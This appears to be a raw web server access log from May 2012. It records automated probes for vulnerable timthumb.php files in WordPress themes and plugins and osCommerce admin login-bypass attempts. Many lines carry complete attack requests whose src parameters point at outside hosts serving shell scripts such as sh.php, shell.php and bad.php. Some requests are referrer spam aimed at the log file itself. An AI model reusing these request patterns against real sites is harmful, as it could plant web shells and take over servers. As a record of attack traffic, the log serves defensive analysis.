119.110.111.96 - - [14/May/2012:04:45:00 +0200] "GET //wp-content/themes/coda/layouts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:01 +0200] "GET //wp-content/themes/coda/includes/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:03 +0200] "GET //wp-content/themes/coda/custom/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:04 +0200] "GET //wp-content/themes/coda/framework/includes/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:06 +0200] "GET //wp-content/themes/coda/framework/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
184.173.6.208 - - [14/May/2012:04:45:07 +0200] "GET /stats/log.keys.html/wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
119.110.111.96 - - [14/May/2012:04:45:08 +0200] "GET //wp-content/themes/coda/functions/scripts/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 336 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
184.173.6.208 - - [14/May/2012:04:45:09 +0200] "GET /wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
119.110.111.96 - - [14/May/2012:04:45:09 +0200] "GET //wp-content/themes/coda/functions/timthumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 337 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
184.173.6.208 - - [14/May/2012:04:45:10 +0200] "GET /stats/wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
119.110.111.96 - - [14/May/2012:04:45:11 +0200] "GET //wp-content/themes/coda/images/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
184.173.6.208 - - [14/May/2012:04:45:12 +0200] "GET /stats/log.keys.html/wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
119.110.111.96 - - [14/May/2012:04:45:13 +0200] "GET //wp-content/themes/coda/inc/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 322 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
184.173.6.208 - - [14/May/2012:04:45:13 +0200] "GET /wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:45:14 +0200] "GET /stats/wp-content/plugins/wp-pagenavi/inc/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
119.110.111.96 - - [14/May/2012:04:45:14 +0200] "GET //wp-content/themes/coda/includes/thumb/timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:16 +0200] "GET //wp-content/themes/coda//thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 316 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:17 +0200] "GET //wp-content/themes/coda/includes/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 324 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:19 +0200] "GET //wp-content/themes/coda/functions/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:20 +0200] "GET //wp-content/themes/coda/options/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:27 +0200] "GET //wp-content/themes/coda/scripts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:29 +0200] "GET //wp-content/themes/coda/modules/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:30 +0200] "GET //wp-content/themes/coda/tools/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 321 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:31 +0200] "GET //wp-content/themes/coda/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 321 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:32 +0200] "GET //wp-content/themes/coda/js/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 318 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:33 +0200] "GET //wp-content/themes/coda/lib/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 319 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:35 +0200] "GET //wp-content/themes/coda/library/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:36 +0200] "GET //wp-content/themes/coda/tools/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:38 +0200] "GET //wp-content/themes/coda/tools/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 327 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:39 +0200] "GET //wp-content/themes/coda/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 321 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:41 +0200] "GET //wp-content/themes/coda/scripts/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:42 +0200] "GET //wp-content/themes/coda/scripts/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:44 +0200] "GET //wp-content/themes/coda/library/functions/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:46 +0200] "GET //wp-content/themes/coda/library/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:47 +0200] "GET //wp-content/themes/coda/library/resource/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 332 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:49 +0200] "GET //wp-content/themes/coda/library/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 329 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:50 +0200] "GET //wp-content/themes/coda/lib/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:52 +0200] "GET //wp-content/themes/coda/lib/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 325 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:53 +0200] "GET //wp-content/themes/coda/lib/script/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:58 +0200] "GET //wp-content/themes/coda/lib/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 326 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:45:59 +0200] "GET //wp-content/themes/coda/layouts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 323 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:46:00 +0200] "GET //wp-content/themes/coda/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:46:02 +0200] "GET //wp-content/themes/coda/custom/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 322 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:46:03 +0200] "GET //wp-content/themes/coda/framework/includes/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 334 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:46:05 +0200] "GET //wp-content/themes/coda/framework/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:46:07 +0200] "GET //wp-content/themes/coda/functions/scripts/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 333 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
184.173.6.208 - - [14/May/2012:04:46:08 +0200] "GET /stats/log.keys.html//wp-content/plugins/wp-pagenavi/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
119.110.111.96 - - [14/May/2012:04:46:08 +0200] "GET //wp-content/themes/coda/functions/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 331 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
184.173.6.208 - - [14/May/2012:04:46:09 +0200] "GET //wp-content/plugins/wp-pagenavi/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
119.110.111.96 - - [14/May/2012:04:46:09 +0200] "GET //wp-content/themes/coda/images/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 322 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
119.110.111.96 - - [14/May/2012:04:46:10 +0200] "GET //wp-content/themes/coda/inc/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 319 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
184.173.6.208 - - [14/May/2012:04:46:10 +0200] "GET /stats//wp-content/plugins/wp-pagenavi/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
119.110.111.96 - - [14/May/2012:04:46:11 +0200] "GET //wp-content/themes/coda/includes/thumb/thumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 330 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
90.198.87.118 - - [14/May/2012:04:46:28 +0200] "GET /stats//wp-content/themes/widescreen/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:46:29 +0200] "GET /stats//wp-content/themes/widescreen/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:46:31 +0200] "GET //wp-content/themes/widescreen/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:46:33 +0200] "GET //wp-content/themes/widescreen/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:47:08 +0200] "GET /stats/log.keys.html//wp-content/themes/widescreen/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 344 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:47:09 +0200] "GET /stats/log.keys.html//wp-content/themes/widescreen/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 344 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:47:10 +0200] "GET //wp-content/themes/widescreen/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:47:11 +0200] "GET //wp-content/themes/widescreen/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:47:13 +0200] "GET /stats//wp-content/themes/widescreen/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:47:14 +0200] "GET /stats//wp-content/themes/widescreen/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
78.137.37.171 - - [14/May/2012:04:47:32 +0200] "GET /logs/access_log HTTP/1.0" 200 1163764 "http://plaandroid.info/sitemap84.html" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00"
78.137.37.171 - - [14/May/2012:04:47:33 +0200] "GET /logs/access_log HTTP/1.0" 200 1163944 "http://plaandroid.info/sitemap84.html" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:04:47:33 +0200] "GET /logs/access_log HTTP/1.0" 200 1164188 "http://plaandroid.info/sitemap84.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]"
78.137.37.171 - - [14/May/2012:04:47:33 +0200] "GET /logs/access_log HTTP/1.0" 200 1164388 "http://plaandroid.info/sitemap84.html" "Opera/9.00 (Windows NT 5.1; U; en)"
78.137.37.171 - - [14/May/2012:04:47:34 +0200] "GET /logs/access_log HTTP/1.0" 200 1164556 "http://plaandroid.info/sitemap84.html" "Mozilla/6.0 (compatible; MSIE 7.0a1; Windows NT 5.2; SV1)"
90.198.87.118 - - [14/May/2012:04:48:19 +0200] "GET /stats/log.keys.html//wp-content/themes/widescreen/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 344 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:48:20 +0200] "GET /stats/log.keys.html//wp-content/themes/widescreen/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 344 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:48:21 +0200] "GET //wp-content/themes/widescreen/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:48:23 +0200] "GET //wp-content/themes/widescreen/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:48:24 +0200] "GET /stats//wp-content/themes/widescreen/timthumb.php?src=http://www.seoulaoi.com/bbs/icon/Home/load.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
90.198.87.118 - - [14/May/2012:04:48:25 +0200] "GET /stats//wp-content/themes/widescreen/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
94.23.195.160 - - [14/May/2012:04:49:17 +0200] "GET /stats//wp-content/themes/Nova/timthumb.php?src=http://blogger.com.bookoftheweek.org/pl.php HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
94.23.195.160 - - [14/May/2012:04:49:19 +0200] "GET //wp-content/themes/Nova/timthumb.php?src=http://blogger.com.bookoftheweek.org/pl.php HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
62.75.235.18 - - [14/May/2012:04:50:43 +0200] "GET /stats/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\",\"Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4\",\"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0\",\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5\",\"Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6\",\"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1\",\"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1\",\"Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9\",\"Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\",\"Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112\",\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)\",\"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3)"
62.75.235.18 - - [14/May/2012:04:50:44 +0200] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\",\"Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4\",\"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0\",\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5\",\"Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6\",\"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1\",\"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1\",\"Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9\",\"Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\",\"Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112\",\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)\",\"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3)"
62.75.235.18 - - [14/May/2012:04:50:46 +0200] "GET /stats/admin/file_manager.php/login.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\",\"Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4\",\"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0\",\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5\",\"Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6\",\"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1\",\"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1\",\"Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9\",\"Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-HK) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5\",\"Seamonkey-1.1.13-1(X11; U; GNU Fedora fc 10) Gecko/20081112\",\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)\",\"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; 